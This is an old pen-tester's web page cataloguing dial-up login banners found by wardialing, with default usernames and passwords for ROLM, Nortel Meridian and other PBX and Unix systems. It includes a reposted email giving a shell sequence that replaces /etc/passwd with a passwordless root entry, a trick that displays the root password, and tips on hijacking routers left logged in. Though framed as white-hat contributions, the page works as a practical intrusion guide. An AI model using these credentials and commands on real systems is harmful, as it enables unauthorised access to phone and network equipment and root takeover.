Banner Contributions from the White Hat community are posted below. Keep em coming. The banners right below are from my experiences.
This dial-up domain tends to be the one that takes the least amount of time. And if lucky, provides instantaneous gratification. It requires no scripting so essentially it is a guessing process. It would be impossible to list all of the common id’s and passwords used for all the dial-in capable systems. Lists and references abound see the left frame below for some links. Here is another from mksecure.
Once again, experience from seeing a multitude of results from wardialing and playing with the resulting pool of potential systems will help immensely. The ability to identify the signature or screen of a type of dial-up system helps provide the basis from where to start utilizing the default userid or passwords for that system. Whichever list you use or consult; the key here is to spend no-more than the amount of time required to expend all of the possibilities for default id’s and passwords and then if unsuccessful move on to the next domain.
Stay tuned for a page devoted to Screen Prints of what the system login prompts look like:
Im constantly updating: If you have anything let me know
PC ANYWHERE
(should be called PC Everywhere)
30-Jun-XX 13:24:40 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
Please press <Enter>...
All you have to do here is have a copy of PC ANYWHERE and dial back the target and see what happens ;>
There are different modes so if it is encrypted it could be tougher etc...
CISCO
30-Jun-XX 13:25:45 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
User Access Verification
Password:
Password:
Password:
% Bad passwords
+++
Typically CISCO so If you can luck out and get in with a password then you would be dropped into a prompt:
RouterA123XX>
Sometimes the person dialing into the router leaves the router in an active state because they did not log out graecfully
30-Jun-XX 13:25:55 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
RouterB345XX>
If this happens then do a SHOW CON or type ? and take it from there.
BAYNETWORKS
30-Jun-XX 13:26:40 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
Bay Networks, Inc. and its Licensors.
Copyright 1992,1993,1994,1995,1996,1997,1998. All rights reserved.
Login:
01-Jul-XX 21:55:39 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
Annex Command Line Interpreter *
Copyright (C) 1988, 1998 Bay Networks
Checking authorization, Please wait...
Annex username:
01-Jul-XX 21:55:39 91XXXXXXXXXX C:
CONNECT 9600/ARQ/V32/LAPM
Annex Command Line Interpreter * Copyright (C) 1988, 1997 Bay Networks
annex:
Consult your favorite default password list
SHIVA LAN ROVERS
30-Jun-XX 16:40:13 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM/V42BIS
@ Userid:
@ Userid:
@ Userid:
@ Userid:
@ Userid:
@ Userid:
Consult your favorite default password list
IBM AIX
30-Jun-XX 17:20:14 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
AIX Version 4
(C) Copyrights by IBM and by others 1982, 1994.
login:
Try uid: oracle pwd:oracle or no password etc..
HP UNIX
30-Jun-XX 17:21:14 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
GenericSysName [HP Release B.10.20] (see /etc/issue)
login:
Consult your favorite default password list
UNIX - VARIOUS
02-Jul-XX 17:28:27 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM/V42BIS
Welcome to SCO UNIX System V/386 Release 3.2
XXXXXX!login:
02-Jul-XX 17:29:27 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM/V42BIS
SCO OpenServer(TM) Release 5 (strXXXX) (tty1A)
*****************************************
****<<Wed Apr XX XX:XX:XX EDT XXXX>>*****
************<< 3.2v5.0.4 >>*************
*****************************************
(Please Use Lower Case Letters!)
login:
02-Jul-XX 17:38:16 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
The system's name is XXXXXXXX.
Welcome to USL UNIX System V Release 4.2 Version 1
login:
02-Jul-XX 17:39:16 91XXXXXXXXXX C:
CONNECT 9600/ARQ/V32/LAPM
Welcome to UnixWare 2.01
The system's name is XXXXXX.
login:
Consult your favorite default password list
ROLM
02-Jul-XX 17:38:16 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
ROLM CBX MODEL 10, 9030A PROCESSOR (Prom Rev 3.4) SITE ID: XXXXXXXX
RELEASE: 9005.6.84 BIND DATE: 27/January/98 12 Megabytes
(C) Copyright 1980-1998 Siemens Rolm Communications Inc. All rights reserved.
ROLM is a registered trademark of Siemens Rolm Communications Inc.
17:38:16 ON Saturday x/xx/xxxx 25 DEGREES C
USERNAME:
PASSWORD:
Not in directory
This is PBX Management console action gang, a few of these
uid/pwd combos work still
admin pwp
eng engineer
op op
op operartor
su super
Or you might see the fails it this way:
USERNAME:
PASSWORD:
INVALID USERNAME-PASSWORD PAIR.
ROLM SIEMENS PHONE MAIL
Login:
Password:
ROLM Phonemail Version 6.4
Login:
Password
ROLM Phonemail Version 6.4
(C) Copyright 1989-2000 Siemens I & C Networks, Inc. All Rights Reserved
!!!
ROLM Phonemail Site ID: xxxxxxxxxx
PhoneMail release 6.4.3
CPU Type of local node is GenuineIntel 80586 133mhz
?Phonemail is active with 16 Channels
Function:
Friday Feb 2, 2002 4:15 AM
sysadmin sysadmin is a good place to start on the uid pwd pair ;>
SECURE ID
Hello
Password :
58945664 :
Hello
Password :
16232368 :
Hello
Password :
77856559 :
Your access is denied, Good Bye.
(If you see this you might want to forget it, this is
challenge response so it will be nearly impossible to hack RSA SecureID@ token)
BANNER (WAR DIAL and PBX) CONTRIBUTIONS SECTION
If you have any contributions feel free to send it along to
If I post your banner or suggestion I certianly point to the credit. Check out the Hacking Meridian seciton and you can see. Newest data first.
From:
Sacha Faust 4/11/02
sacha@severus.org
Thanks Sacha!
Stephan, From some results I found,
Welcome to USL UNIX System V Release 4.2 Version 1 == AUDIX or it's link with some AUDIX system. The "System's name is" part always seems to be set to "Intuity"
Here are some additionall banners I found :
1. OpenVMS VAX
Welcome to OpenVMS VAX V6.1
Username:
2. Direct Audix
System name: audix
login:
3. QNX
QNX Version 3.21 Node 0 $tty3 Local Time: XXX
Copyright (c) Quantum Software Systems Ltd. 1983,1989
Login:
4. QNX (might vary depending on OS
version or config)
Copyright (c) Quantum Software Systems Ltd. 1983,1989
Login:
5. CITRIX metaframe (not 100% sure)
ICA
---------
Sacha Faust
sacha@severus.org
HACKING Meridian NEW Feb 2, 2002 for all you GroundHogs :> (this is in the Meridian Section also)
Sent in from a fellow Pen Tester. This stuff does work! because I've gotten in with it. There were a few techniques I was not privy to so this was GREAT info.
Posted with Permission from Mark A. Rowe at Pentest Limited
Thanks Mark!
----------------------- Email Excerpt -----------------------------
Hi Stephan,
I've just been on your website www.m4phr1k.com which is great. While browsing I noticed that you had started a section on Meridian and thought you might be interested in an email I posted to the pen-test list a while back. At the time HD Moore asked me whether I was going to write it up or put it on a website but I forgot all about it. Anyway if didn't already know it and think it is useful feel free to put it on your site when you have the time. I've never come across a system in the UK where the service account has had its password changed.
The email is below. I'll be looking at an Ericsson MD110 in the next couple of weeks, if I find anything useful I will let you know.
Regards,
Mark.
========================================================================
I came across this while doing a security review 3 years ago. I tried to contact
Nortel several times but never received a response. I guess they don't think
it is important :-o
If the PBX is hooked into the actual
network, there are quite a few ways to get access to the system. The easiest
method is to tftp the /etc/passwd file
off the system and crack the hashes. If you go this route, you will get a user
account called "service" with a password of "smile" ;) If
you log into
the system with this account, you will notice that /etc is mode 0777, so getting
root access is trivial:
$ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd
$ mv /etc/passwd /etc/passwd.bak
$ mv /etc/mah_passwd /etc/passwd
$ su root
# mv /etc/passwd.bak /etc/passwd
I don't remember which version of this system it was, but the client software
that came with it was called "Meridian Terminal Emulator". You could
manage
the PBX with this by first logging in with 0000/0000 then giving it the manager
password of "9999". I really wish I had more time to write up the
stuff I find out there.
HD
Anyway I think the service account exists on the MAX,CCR and Link Meridian components.
Here are some other stuff I came across,
Accounts that give UNIX level access:
| BOX | Account | Password | Use |
| MAX, CCR, LINK | service | smile | General Engineer Account |
| CCR, LINK | disttech | 4tas | Engineer Account |
| MAX | root | 3ep5w2u | Root |
Accounts that give application level
access
| BOX | Account | Password | Use |
| MAX | maint | ntacdmax | Maintenance Account |
| CCR, LINK | maint | maint | Maintenance Accout |
| CCR | ccrusr | ccrusr | User Account |
| LINK | mlusr | mlusr | User Account |
To gain root access on Link or CCR:
Login as disttech/4tas
type "showpwd"
at prompt enter first 3 letters from Yesterday and first 3 from Tomorrow (e.g. if today is Tuesday enter "MonWed" - note the capitalisation).
When you are told this is invalid, enter the same thing again.
The root password is now displayed in plain text on the screen. You can now "su" to root with this password.
To gain access to the Meridian itself - there are two methods of access depending how the switch is set up. Try password only first as most will probably be set up like this -
Password only
enter
logi 0000 (customer level)
logi 1111 (a bit higher)
logi 8429 (maintence)
Username and password
logi customer
PASS? 0000
logi admin1
PASS? 1111
logi to
PASS? 8429
Hope this helps,
Mark.
--
Mark Rowe
IT Security Consultant
PenTest Limited
www.pentest-limited.com